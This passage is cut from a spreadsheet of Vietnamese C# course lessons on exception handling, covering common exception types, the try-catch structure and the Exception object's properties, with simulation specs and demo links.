```
Phòng tránh: kiểm tra `i &lt; arr.Length` trước khi truy cập.
### NullReferenceException
Xảy ra khi dùng dấu chấm trên một biến đang là `null`, tức là không trỏ tới đối tượng nào.
```csharp
string s = null;
int n = s.Length;   // NullReferenceException: Object reference not set to an instance of an object.
```
Phòng tránh: kiểm tra `s != null` hoặc dùng toán tử `s?.Length`.
### InvalidCastException
Xảy ra khi **ép kiểu không hợp lệ**: biến `object` đang chứa kiểu này nhưng bị ép về kiểu khác.
```csharp
object o = "abc";
int n = (int)o;   // InvalidCastException: Unable to cast object of type 'System.String' to type 'System.Int32'.
```
Phòng tránh: kiểm tra bằng `is` (ví dụ `if (o is int)`) hoặc dùng `as` trước khi ép.
### OverflowException
Xảy ra khi phép tính **tràn số** trong ngữ cảnh kiểm tra tràn, ví dụ khối `checked`.
```csharp
checked
{
    int x = int.MaxValue;   // 2147483647
    x = x + 1;              // OverflowException: Arithmetic operation resulted in an overflow.
}
```
Nếu không có `checked`, mặc định C# không kiểm tra tràn số và kết quả quay vòng thành số âm (`-2147483648`). Phòng tránh: dùng kiểu lớn hơn như `long`, hoặc kiểm tra giới hạn trước khi cộng.
## Bảng tóm lược
| Exception | Nguyên nhân | Cách phòng tránh |
|---|---|---|
| `FormatException` | Chuỗi sai định dạng khi đổi kiểu | `int.TryParse` |
| `DivideByZeroException` | Chia số nguyên cho 0 | Kiểm tra `b != 0` |
| `IndexOutOfRangeException` | Chỉ số ngoài mảng | Kiểm tra `i &lt; arr.Length` |
| `NullReferenceException` | Dùng biến `null` | Kiểm tra `null` hoặc `?.` |
| `InvalidCastException` | Ép kiểu sai | `is` hoặc `as` |
| `OverflowException` | Tràn số trong `checked` | Kiểu lớn hơn, kiểm tra giới hạn |
## Hoạt động: Sáu exception qua từng dòng code
Mỗi tab của mô phỏng là một exception, với cùng ba bước: chuẩn bị dữ liệu, chạy dòng gây lỗi, rồi hiện kết quả. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **FormatException**. Biến `s = "12a"` có cả chữ lẫn số. Dòng `int.Parse(s)` ném lỗi, thẻ đỏ hiện thông điệp `The input string '12a' was not in a correct format.`
- Mở tab **DivideByZeroException**. Với `a = 10`, `b = 0`, dòng `a / b` ném lỗi với thông điệp `Attempted to divide by zero.`
- Mở tab **IndexOutOfRangeException**. Mảng `arr` có 3 phần tử (`arr.Length = 3`), nhưng `arr[3]` vượt quá chỉ số lớn nhất là 2. Thông điệp: `Index was outside the bounds of the array.`
- Mở tab **NullReferenceException**. Biến `s` là `null`, nên `s.Length` ném lỗi: `Object reference not set to an instance of an object.`
- Mở tab **InvalidCastException**. Biến `o` kiểu `object` chứa chuỗi "abc", nhưng `(int)o` ép về `int`. Thông điệp: `Unable to cast object of type 'System.String' to type 'System.Int32'.`
- Mở tab **OverflowException**. Trong khối `checked`, `x = int.MaxValue = 2147483647`, cộng thêm 1 thì tràn: `Arithmetic operation resulted in an overflow.` Thẻ cũng ghi chú rằng nếu không có `checked`, kết quả quay vòng thành số âm.
Ở mỗi tab, thẻ lỗi cuối cùng còn gợi ý cách phòng tránh tương ứng.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/cac-loai-exception-pho-bien-trong-c-sharp/" title="Các loại Exception phổ biến" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi loại exception ứng với một kiểu sự cố cụ thể. Đọc tên loại và dòng gây lỗi là bước đầu tiên để biết cách sửa.
## Tóm tắt
- Mọi exception đều kế thừa từ `System.Exception`.
- `FormatException`: chuỗi sai định dạng. `DivideByZeroException`: chia số nguyên cho 0.
- `IndexOutOfRangeException`: chỉ số ngoài mảng. `NullReferenceException`: dùng biến `null`.
- `InvalidCastException`: ép kiểu sai. `OverflowException`: tràn số trong `checked`.
- Chia `double` cho 0 không ném exception mà cho `Infinity`.
- Phần lớn các lỗi này có thể phòng tránh bằng cách kiểm tra điều kiện trước.</t>
        </is>
      </c>
    </row>
    <row r="16" ht="409.6" customHeight="1" s="18">
      <c r="A16" s="10" t="n">
        <v>15</v>
      </c>
      <c r="B16" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C16" s="10" t="inlineStr">
        <is>
          <t>Cấu trúc try-catch cơ bản</t>
        </is>
      </c>
      <c r="D16" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về khối try-catch</t>
        </is>
      </c>
      <c r="E16" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F16" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G16" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H16" s="10" t="inlineStr">
        <is>
          <t>Thấy đường đi của chương trình qua try-catch trong hai trường hợp: không lỗi và có lỗi.</t>
        </is>
      </c>
      <c r="I16" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J16" s="10" t="inlineStr">
        <is>
          <t>Sơ đồ luồng nhỏ đặt cạnh mã: khối try, khối catch, khối 'sau try-catch'. Đường đi tô xanh khi bình thường, tô đỏ khi nhảy sang catch. Các dòng còn lại trong try bị bỏ qua hiện mờ.</t>
        </is>
      </c>
      <c r="K16" s="10" t="inlineStr">
        <is>
          <t>H04, H03</t>
        </is>
      </c>
      <c r="L16" s="10" t="inlineStr">
        <is>
          <t>Không lỗi ("25") | Có lỗi ("abc")</t>
        </is>
      </c>
      <c r="M16" s="10" t="inlineStr">
        <is>
          <t>Không lỗi: vào try → Parse thành công → in "Bạn 25 tuổi" → hết try → catch bị bỏ qua → in "Kết thúc".
Có lỗi: vào try → Parse ném FormatException.
Dòng in tuổi còn lại trong try bị bỏ qua (mờ), chương trình nhảy thẳng vào catch.
catch in "Vui lòng nhập số".
Chương trình chạy tiếp sau khối, in "Kết thúc".</t>
        </is>
      </c>
      <c r="N16" s="10" t="inlineStr">
        <is>
          <t>"25" và "abc"</t>
        </is>
      </c>
      <c r="O16" s="10" t="inlineStr">
        <is>
          <t>Lỗi trong try làm phần còn lại của try bị bỏ qua; catch chỉ chạy khi có lỗi; chương trình tiếp tục sau khối try-catch.</t>
        </is>
      </c>
      <c r="P16" s="10" t="n"/>
      <c r="Q16" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/gioi-thieu-ve-khoi-try-catch/index.html</t>
        </is>
      </c>
      <c r="R16" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/gioi-thieu-ve-khoi-try-catch/</t>
        </is>
      </c>
      <c r="S16" s="10" t="n"/>
      <c r="T16" s="12" t="n"/>
      <c r="U16" s="12" t="n"/>
      <c r="V16" s="21" t="inlineStr">
        <is>
          <t>Trong lập trình, không phải lúc nào mọi thứ cũng diễn ra suôn sẻ. Có những lúc chương trình của bạn có thể gặp phải các tình huống bất ngờ, không mong muốn, dẫn đến lỗi hoặc thậm chí là dừng hoạt động đột ngột (crash). Những tình huống này được gọi là ngoại lệ (exceptions). Để đảm bảo ứng dụng của bạn luôn ổn định và cung cấp trải nghiệm tốt cho người dùng, việc xử lý các ngoại lệ này là vô cùng quan trọng.
C# cung cấp một cơ chế mạnh mẽ để xử lý ngoại lệ có tên là khối try-catch. Đây là công cụ cơ bản giúp bạn "bắt" và xử lý các lỗi một cách có kiểm soát, ngăn chặn chương trình bị sập và cho phép bạn phục hồi hoặc thông báo lỗi một cách thân thiện.
Cú pháp cơ bản của khối try-catch
Cấu trúc try-catch trong C# được thiết kế để bao bọc các đoạn mã có khả năng gây ra ngoại lệ. Cú pháp cơ bản của nó như sau:
try
{
    // Đoạn mã có khả năng gây ra ngoại lệ
    // Ví dụ: chia cho 0, truy cập file không tồn tại,
    // chuyển đổi dữ liệu không hợp lệ.
}
catch (Exception ex)
{
    // Đoạn mã xử lý ngoại lệ nếu nó xảy ra trong khối try
    // 'ex' là đối tượng ngoại lệ chứa thông tin chi tiết về lỗi
}
Trong cấu trúc này, có hai khối chính:
try block: Chứa mã mà bạn muốn giám sát để phát hiện ngoại lệ.
catch block: Chứa mã sẽ được thực thi khi một ngoại lệ xảy ra trong khối try.
Chúng ta sẽ đi sâu vào chức năng của từng khối.
Chức năng của khối try: Nơi mã tiềm ẩn lỗi
Khối try là nơi bạn đặt tất cả các câu lệnh mà bạn nghi ngờ có thể gây ra một ngoại lệ. Mục đích của khối try là "thử" thực thi một đoạn mã và "theo dõi" xem có bất kỳ lỗi nào xảy ra trong quá trình đó hay không.
Nếu tất cả các câu lệnh trong khối try được thực thi mà không có bất kỳ ngoại lệ nào, thì khối catch tương ứng sẽ bị bỏ qua và chương trình sẽ tiếp tục thực thi các câu lệnh sau khối try-catch.
Tuy nhiên, nếu một ngoại lệ xảy ra trong khối try, ngay lập tức, việc thực thi khối try sẽ dừng lại. Hệ thống sẽ tìm kiếm một khối catch phù hợp để xử lý ngoại lệ đó.
Ví dụ về mã có khả năng gây ra ngoại lệ:
Hãy xem xét một ví dụ đơn giản về việc chia hai số nguyên. Nếu số chia là 0, một ngoại lệ DivideByZeroException sẽ xảy ra.
Console.Write("Nhập tử số: ");
int tuSo = Convert.ToInt32(Console.ReadLine());
Console.Write("Nhập mẫu số: ");
int mauSo = Convert.ToInt32(Console.ReadLine());
// Đoạn mã này có thể gây lỗi nếu mauSo là 0
int ketQua = tuSo / mauSo;
Console.WriteLine($"Kết quả: {ketQua}");
Nếu bạn chạy đoạn mã trên và nhập 0 cho mẫu số, chương trình sẽ dừng lại với một lỗi System.DivideByZeroException. Để ngăn chặn điều này, chúng ta sẽ đặt đoạn mã có khả năng gây lỗi vào khối try.
Chức năng của khối catch: Nơi xử lý ngoại lệ
Khối catch là nơi bạn định nghĩa cách ứng dụng của bạn sẽ phản ứng khi một ngoại lệ xảy ra trong khối try liên quan. Khi một ngoại lệ được "ném" (thrown) từ khối try, chương trình sẽ chuyển quyền kiểm soát sang khối catch phù hợp.
Mục tiêu chính của khối catch là:
Ngăn chặn chương trình bị crash: Thay vì dừng đột ngột, bạn có thể xử lý lỗi một cách có kiểm soát.
Thông báo lỗi cho người dùng: Cung cấp thông báo thân thiện thay vì thông báo lỗi kỹ thuật khó hiểu.
Ghi log lỗi: Lưu lại thông tin chi tiết về lỗi để nhà phát triển có thể điều tra và sửa chữa sau này.
Phục hồi chương trình: Cố gắng đưa chương trình về trạng thái ổn định hoặc thực hiện một hành động thay thế.
Mỗi khối catch có thể chỉ định loại ngoại lệ mà nó muốn bắt (ví dụ: DivideByZeroException, FormatException, FileNotFoundException). Nếu bạn chỉ định Exception (như trong cú pháp cơ bản), khối catch đó sẽ bắt mọi loại ngoại lệ.
Đối tượng Exception (ex trong ví dụ cú pháp) được truyền vào khối catch chứa nhiều thông tin hữu ích về lỗi đã xảy ra. Các thuộc tính như Message, StackTrace sẽ cung cấp chi tiết về nguyên nhân và vị trí lỗi. Bạn sẽ tìm hiểu sâu hơn về đối tượng Exception và các thuộc tính của nó trong bài đọc "Đối tượng Exception và các thuộc tính".
Ví dụ về cách sử dụng khối catch:
Tiếp nối ví dụ chia số, chúng ta sẽ thêm khối catch để xử lý ngoại lệ DivideByZeroException:
Console.Write("Nhập tử số: ");
int tuSo = Convert.ToInt32(Console.ReadLine());
Console.Write("Nhập mẫu số: ");
int mauSo = Convert.ToInt32(Console.ReadLine());
try
{
    int ketQua = tuSo / mauSo; // Đây là mã có thể gây lỗi
    Console.WriteLine($"Kết quả: {ketQua}");
}
catch (DivideByZeroException ex) // Bắt ngoại lệ chia cho 0 cụ thể
{
    Console.WriteLine("Lỗi: Không thể chia cho số 0.");
    // Có thể ghi log lỗi ở đây: Console.WriteLine($"Chi tiết lỗi: {ex.Message}");
}
catch (FormatException ex) // Bắt ngoại lệ nếu người dùng nhập không phải số
{
    Console.WriteLine("Lỗi: Vui lòng nhập một số nguyên hợp lệ.");
    // Có thể ghi log lỗi ở đây
}
catch (Exception ex) // Bắt tất cả các ngoại lệ khác
{
    Console.WriteLine("Đã xảy ra lỗi không xác định.");
    Console.WriteLine($"Chi tiết lỗi: {ex.Message}");
}
Console.WriteLine("Chương trình tiếp tục sau khi xử lý lỗi.");
Trong ví dụ này:
Nếu mauSo là 0, DivideByZeroException sẽ được bắt bởi khối catch (DivideByZeroException ex).
Nếu người dùng nhập văn bản thay vì số (ví dụ: "abc"), FormatException sẽ được bắt.
Bất kỳ ngoại lệ nào khác (nếu có) sẽ được bắt bởi khối catch (Exception ex).
Nhờ try-catch, chương trình không bị dừng đột ngột mà thay vào đó hiển thị một thông báo lỗi thân thiện và tiếp tục thực thi các câu lệnh sau khối try-catch. Đây là cốt lõi của việc xử lý ngoại lệ chuyên nghiệp, giúp ứng dụng của bạn trở nên mạnh mẽ và đáng tin cậy hơn.</t>
        </is>
      </c>
      <c r="W16" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu về khối try-catch
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Viết cú pháp cơ bản của khối `try-catch` trong C#.
- Giải thích vai trò của khối `try` (đặt mã có thể lỗi) và khối `catch` (xử lý lỗi).
- Mô tả đường đi của chương trình khi không có lỗi và khi có lỗi.
- Biết rằng sau `try-catch`, chương trình vẫn chạy tiếp.
- Quan sát hai đường đi qua `try-catch` với dữ liệu "25" và "abc" bằng hoạt động mô phỏng.
## Vì sao cần try-catch
Ở các bài trước, bạn đã biết exception không ai bắt thì chương trình dừng đột ngột. Khối **`try-catch`** cho phép ta "bắt" lỗi và xử lý có kiểm soát: báo người dùng, ghi log, hoặc dùng giá trị thay thế, rồi để chương trình chạy tiếp.
## Cú pháp cơ bản
```csharp
try
{
    // mã có thể gây exception
}
catch (Exception ex)
{
    // mã xử lý khi exception xảy ra trong try
}
```
- **Khối `try`:** chứa các câu lệnh có thể gây exception.
- **Khối `catch`:** chạy **chỉ khi** có exception xảy ra trong `try`. Biến `ex` là đối tượng exception mang thông tin về lỗi.
## Khối try: nơi đặt mã có thể lỗi
Chương trình chạy các dòng trong `try` từ trên xuống.
- Nếu **không có lỗi**, `try` chạy hết và khối `catch` bị bỏ qua.
- Nếu **có lỗi** ở một dòng, phần còn lại của `try` bị bỏ qua và chương trình **nhảy ngay sang `catch`** phù hợp.
## Khối catch: nơi xử lý lỗi
`catch` có thể chỉ rõ loại exception cần bắt, ví dụ `catch (FormatException)`. Chỉ khi exception có loại tương ứng thì khối này mới chạy. Nếu viết `catch (Exception ex)`, khối này bắt mọi loại exception. Đối tượng `ex` có các thuộc tính như `Message` và `StackTrace`, bạn sẽ học ở bài sau.
Ví dụ hoàn chỉnh:
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string input = "abc";
        try
        {
            int age = int.Parse(input);
            Console.WriteLine("Bạn " + age + " tuổi");
        }
        catch (FormatException)
        {
            Console.WriteLine("Vui lòng nhập số");
        }
        Console.WriteLine("Kết thúc");
    }
}
// Với input = "abc":
// Vui lòng nhập số
// Kết thúc
//
// Với input = "25":
// Bạn 25 tuổi
// Kết thúc
```
Dù có lỗi hay không, dòng `Console.WriteLine("Kết thúc")` sau khối `try-catch` vẫn chạy.
## Hoạt động: Hai đường đi qua try-catch
Mô phỏng dưới đây chạy cùng một đoạn `try-catch` với hai giá trị nhập. Sơ đồ "Đường đi của chương trình" có ba chặng: Khối try, Khối catch và Sau try-catch. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Không lỗi ("25")**. Chương trình vào `try` với `input = "25"`. `int.Parse("25")` thành công, `age = 25`, rồi in `Bạn 25 tuổi`. Hết `try`, khối catch được đánh dấu "bị bỏ qua", sau đó chương trình in `Kết thúc`. Cuối cùng khối try xanh, catch xám và phần sau try-catch xanh.
- Chuyển sang tab **Có lỗi ("abc")**. `int.Parse("abc")` ném `FormatException`: khối try chuyển đỏ và thẻ lỗi hiện thông điệp `The input string 'abc' was not in a correct format.` Dòng in tuổi bị làm mờ vì không được chạy, chương trình nhảy thẳng vào catch. `catch (FormatException)` bắt đúng loại lỗi và in `Vui lòng nhập số`. Sau đó chương trình chạy tiếp và in `Kết thúc`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/gioi-thieu-ve-khoi-try-catch/" title="Giới thiệu về khối try-catch" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `catch` chỉ chạy khi có lỗi trong `try`. Lỗi làm phần còn lại của `try` bị bỏ qua, nhưng chương trình không dừng mà tiếp tục sau khối `try-catch`.
## Nhiều khối catch
Bạn có thể đặt nhiều `catch` để xử lý từng loại lỗi khác nhau. Hãy đặt loại **cụ thể** lên trước và `catch (Exception)` (bắt chung) ở cuối:
```csharp
try
{
    int ketQua = tuSo / mauSo;
}
catch (DivideByZeroException)
{
    Console.WriteLine("Không thể chia cho 0.");
}
catch (Exception ex)
{
    Console.WriteLine("Lỗi khác: " + ex.Message);
}
```
Nếu đặt `catch (Exception)` trước, trình biên dịch sẽ báo lỗi vì các `catch` cụ thể phía sau không bao giờ được chạy.
## Tóm tắt
- `try` chứa mã có thể gây exception, `catch` xử lý khi có exception.
- Không có lỗi: `try` chạy hết, `catch` bị bỏ qua.
- Có lỗi: phần còn lại của `try` bị bỏ qua, chương trình nhảy sang `catch` phù hợp.
- Chương trình luôn chạy tiếp sau khối `try-catch`.
- Đặt `catch` cụ thể trước, `catch (Exception)` chung ở cuối.</t>
        </is>
      </c>
    </row>
    <row r="17" ht="409.6" customHeight="1" s="18">
      <c r="A17" s="10" t="n">
        <v>16</v>
      </c>
      <c r="B17" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C17" s="10" t="inlineStr">
        <is>
          <t>Cấu trúc try-catch cơ bản</t>
        </is>
      </c>
      <c r="D17" s="10" t="inlineStr">
        <is>
          <t>Đối tượng Exception và các thuộc tính</t>
        </is>
      </c>
      <c r="E17" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F17" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G17" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H17" s="10" t="inlineStr">
        <is>
          <t>Biết lấy thông tin từ biến ex trong catch: Message cho người dùng, StackTrace cho lập trình viên.</t>
        </is>
      </c>
      <c r="I17" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J17" s="10" t="inlineStr">
        <is>
          <t>Bảng kiểm tra đối tượng (inspector) giống cửa sổ Watch: hiện lần lượt GetType().Name, Message, StackTrace (rút gọn 2 dòng), InnerException = null.</t>
        </is>
      </c>
      <c r="K17" s="10" t="inlineStr">
        <is>
          <t>H03, H07</t>
        </is>
      </c>
      <c r="L17" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M17" s="10" t="inlineStr">
        <is>
          <t>Main gọi Chia(10, 0); trong Chia, 10 / 0 ném DivideByZeroException.
catch (DivideByZeroException ex) bắt được; ex là một đối tượng.
Hiện ex.GetType().Name = "DivideByZeroException".
Hiện ex.Message = "Attempted to divide by zero."
Hiện ex.StackTrace: "at Program.Chia(Int32 a, Int32 b) in Program.cs:line 12" và "at Program.Main() in Program.cs:line 5".
Xong: Message dùng để báo người dùng, StackTrace dùng để tìm chỗ lỗi.</t>
        </is>
      </c>
      <c r="N17" s="10" t="inlineStr">
        <is>
          <t>Chia(10, 0)</t>
        </is>
      </c>
      <c r="O17" s="10" t="inlineStr">
        <is>
          <t>Exception là đối tượng có thuộc tính; StackTrace cho biết lỗi đi qua những hàm nào.</t>
        </is>
      </c>
      <c r="P17" s="10" t="inlineStr">
        <is>
          <t>Số dòng trong StackTrace chỉ có khi có tệp .pdb (thường là bản Debug).</t>
        </is>
      </c>
      <c r="Q17" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/doi-tuong-exception-va-cac-thuoc-tinh/index.html</t>
        </is>
      </c>
      <c r="R17" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/doi-tuong-exception-va-cac-thuoc-tinh/</t>
        </is>
      </c>
      <c r="S17" s="10" t="n"/>
      <c r="T17" s="12" t="n"/>
      <c r="U17" s="12" t="n"/>
      <c r="V17" s="21" t="inlineStr">
        <is>
          <t>Đối tượng Exception: Chìa khóa để hiểu lỗi
Trong bài đọc trước, bạn đã làm quen với cấu trúc try-catch cơ bản, một cơ chế mạnh mẽ để bắt và xử lý các ngoại lệ (exception) trong C#. Khi một ngoại lệ xảy ra bên trong khối try và được bắt bởi khối catch tương ứng, C# không chỉ đơn thuần "ngăn chặn" chương trình dừng đột ngột. Thay vào đó, nó tạo ra một đối tượng đặc biệt chứa đựng tất cả thông tin chi tiết về lỗi đã xảy ra và truyền đối tượng này vào khối catch.
Đối tượng này có kiểu là System.Exception hoặc một kiểu dẫn xuất từ System.Exception (ví dụ: FormatException, DivideByZeroException, NullReferenceException). Việc hiểu và sử dụng đối tượng Exception này là vô cùng quan trọng, bởi nó cung cấp cho bạn "bản đồ" chi tiết để xác định nguyên nhân, vị trí và ngữ cảnh của lỗi. Không có đối tượng này, việc gỡ lỗi sẽ trở nên vô cùng khó khăn.
Bạn khai báo đối tượng Exception trong khối catch như sau:
try
{
    // Đoạn mã có thể gây ra ngoại lệ
}
catch (Exception ex) // 'ex' là tên biến của đối tượng Exception
{
    // Xử lý ngoại lệ sử dụng thông tin từ 'ex'
}
Biến ex (hoặc bất kỳ tên nào bạn chọn) lúc này sẽ là một thực thể của lớp Exception (hoặc lớp con của nó), mang theo hàng loạt thuộc tính hữu ích mà chúng ta sẽ khám phá ngay sau đây.
Các thuộc tính quan trọng của đối tượng Exception
Đối tượng Exception cung cấp nhiều thuộc tính giúp bạn thu thập thông tin toàn diện về lỗi. Dưới đây là bốn thuộc tính quan trọng nhất mà bạn sẽ thường xuyên sử dụng:
1. Message
Thuộc tính Message cung cấp một mô tả ngắn gọn, dễ đọc về lỗi đã xảy ra. Đây thường là thông tin đầu tiên mà bạn muốn xem khi một ngoại lệ được bắt. Message giúp bạn hiểu bản chất của vấn đề mà không cần đi sâu vào chi tiết kỹ thuật ngay lập tức.
Ví dụ, nếu bạn cố gắng chuyển đổi một chuỗi không phải số thành số nguyên, Message có thể là "Input string was not in a correct format." (Chuỗi đầu vào không đúng định dạng.)
2. StackTrace
Thuộc tính StackTrace là một trong những công cụ mạnh mẽ nhất để gỡ lỗi. Nó trả về một chuỗi chứa dấu vết của tất cả các lệnh gọi phương thức đã dẫn đến ngoại lệ. Nói cách khác, nó cho bạn biết chính xác chuỗi các hàm đã được gọi, từ điểm bắt đầu của chương trình cho đến dòng mã nơi ngoại lệ được ném ra.
StackTrace bao gồm tên tệp nguồn, số dòng, và tên phương thức cho mỗi khung hình trong ngăn xếp cuộc gọi. Nhờ có StackTrace, bạn có thể dễ dàng xác định vị trí chính xác của lỗi trong mã nguồn của mình.
3. Source
Thuộc tính Source trả về tên của ứng dụng hoặc đối tượng đã gây ra lỗi. Trong các ứng dụng lớn, được chia thành nhiều dự án (project) hoặc thư viện, Source có thể giúp bạn xác định được thành phần nào trong hệ thống của bạn là nguyên nhân gốc rễ của ngoại lệ.
Ví dụ, nếu ngoại lệ xảy ra trong một thư viện DLL cụ thể mà bạn đang sử dụng, Source có thể hiển thị tên của thư viện đó.
4. TargetSite
Thuộc tính TargetSite trả về một đối tượng MethodBase đại diện cho phương thức đã ném ra ngoại lệ. Mặc dù StackTrace cung cấp thông tin tương tự trong một định dạng chuỗi, TargetSite cung cấp một tham chiếu trực tiếp đến đối tượng phương thức, cho phép bạn truy cập các thông tin chi tiết khác về phương thức đó (như tên, kiểu trả về, tham số) nếu cần.
Cách sử dụng các thuộc tính để lấy thông tin chi tiết về lỗi
Việc truy cập các thuộc tính này rất đơn giản. Bạn chỉ cần sử dụng toán tử dấu chấm . trên đối tượng Exception của mình. Hãy xem xét ví dụ sau, nơi chúng ta cố tình tạo ra một FormatException bằng cách chuyển đổi một chuỗi không hợp lệ thành số nguyên:
using System;
public class Program
{
    public static void Main(string[] args)
    {
        Console.WriteLine("Chào mừng đến với ứng dụng chuyển đổi số!");
        Console.Write("Vui lòng nhập một số nguyên: ");
        string userInput = Console.ReadLine();
        try
        {
            int number = int.Parse(userInput); // Dòng này có thể gây ra FormatException
            Console.WriteLine($"Bạn đã nhập số: {number}");
        }
        catch (FormatException ex)
        {
            Console.WriteLine("\n--- Đã xảy ra lỗi định dạng! ---");
            Console.WriteLine($"Thông báo lỗi (Message): {ex.Message}");
            Console.WriteLine($"Nguồn lỗi (Source): {ex.Source}");
            Console.WriteLine($"Phương thức gây lỗi (TargetSite): {ex.TargetSite?.Name}"); // Dùng ?. để tránh NullReferenceException
            Console.WriteLine($"Dấu vết ngăn xếp (StackTrace):\n{ex.StackTrace}");
        }
        catch (Exception ex) // Bắt các ngoại lệ khác nếu có
        {
            Console.WriteLine($"\n--- Đã xảy ra một lỗi không mong muốn khác: {ex.Message} ---");
        }
        Console.WriteLine("\nChương trình kết thúc.");
    }
}
Thử nghiệm chương trình:
Nhập một số hợp lệ (ví dụ: 123): Chương trình sẽ in ra "Bạn đã nhập số: 123" và kết thúc bình thường.
Nhập một chuỗi không hợp lệ (ví dụ: hello): Chương trình sẽ bắt FormatException và in ra thông tin chi tiết về lỗi:
Chào mừng đến với ứng dụng chuyển đổi số!
Vui lòng nhập một số nguyên: hello
--- Đã xảy ra lỗi định dạng! ---
Thông báo lỗi (Message): Input string was not in a correct format.
Nguồn lỗi (Source): System.Private.CoreLib
Phương thức gây lỗi (TargetSite): Parse
Dấu vết ngăn xếp (StackTrace):
   at System.Number.ParseInt32(ReadOnlySpan`1 value, NumberStyles style, IFormatProvider provider)
   at System.Int32.Parse(String s)
   at Program.Main(String[] args) in /app/Program.cs:line 13
Chương trình kết thúc.
Trong ví dụ trên, bạn có thể thấy rõ:
Message cho biết chuỗi đầu vào không đúng định dạng.
Source là System.Private.CoreLib, nơi chứa các lớp cơ bản của .NET, bao gồm cả phương thức int.Parse.
TargetSite là phương thức Parse, xác nhận rằng đây là phương thức đã ném lỗi.
StackTrace hiển thị chi tiết các bước dẫn đến lỗi: Main gọi Int32.Parse, mà Int32.Parse lại gọi Number.ParseInt32, và lỗi xảy ra ở đó. Quan trọng nhất, nó chỉ ra dòng mã trong Program.cs (line 13) nơi int.Parse(userInput) được gọi, giúp bạn nhanh chóng xác định vị trí lỗi trong code của mình.
Việc thu thập và ghi lại những thông tin này (thường là vào file log) là một thực hành tốt trong lập trình chuyên nghiệp. Nó không chỉ giúp bạn gỡ lỗi trong quá trình phát triển mà còn cực kỳ hữu ích khi ứng dụng của bạn gặp sự cố trong môi trường sản xuất, giúp đội ngũ hỗ trợ và phát triển nhanh chóng tìm ra nguyên nhân và khắc phục.</t>
        </is>
      </c>
      <c r="W17" s="22" t="inlineStr">
        <is>
          <t># Đối tượng Exception và các thuộc tính
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích biến `ex` trong `catch` là một đối tượng chứa thông tin về lỗi.
- Dùng `ex.GetType().Name`, `ex.Message` và `ex.StackTrace` đúng mục đích.
- Phân biệt `Message` (cho người dùng) với `StackTrace` (cho lập trình viên).
- Hiểu `InnerException` là gì và khi nào nó là `null`.
- Quan sát từng thuộc tính của `ex` xuất hiện khi lỗi bị bắt bằng hoạt động mô phỏng.
## Biến ex là một đối tượng
Khi exception bị bắt, .NET truyền đối tượng exception vào khối `catch` qua một biến, thường đặt tên là `ex`:
```csharp
try
{
    // mã có thể lỗi
}
catch (DivideByZeroException ex)
{
    // dùng ex ở đây
}
```
Kiểu của `ex` là `Exception` hoặc một lớp con (ví dụ `DivideByZeroException`). Đối tượng này mang theo thông tin giúp bạn hiểu lỗi.
## Các thuộc tính quan trọng
| Thuộc tính | Ý nghĩa | Dùng để |
|---|---|---|
| `ex.GetType().Name` | Tên loại exception | Biết lỗi thuộc nhóm nào |
| `Message` | Câu mô tả lỗi dễ đọc | Báo cho người dùng |
| `StackTrace` | Chuỗi các phương thức đã gọi tới chỗ lỗi | Tìm vị trí lỗi trong code |
| `InnerException` | Exception gốc nếu lỗi này bọc một lỗi khác | Truy ra nguyên nhân sâu hơn |
Ngoài ra còn có `Source` (tên assembly gây lỗi) và `TargetSite` (phương thức ném lỗi), ít dùng hơn trong bài tập cơ bản.
### Message
`Message` là mô tả ngắn, dễ đọc. Ví dụ với chia cho 0, thông điệp là `Attempted to divide by zero.` Thông điệp mặc định của .NET là tiếng Anh, vì vậy khi báo cho người dùng cuối, bạn thường tự viết câu thân thiện hơn.
### StackTrace
`StackTrace` liệt kê các phương thức đã được gọi, từ nơi xảy ra lỗi ngược lên nơi gọi. Khi chương trình có thông tin debug, mỗi dòng còn kèm tên tập tin và số dòng. Đây là công cụ mạnh nhất để định vị lỗi.
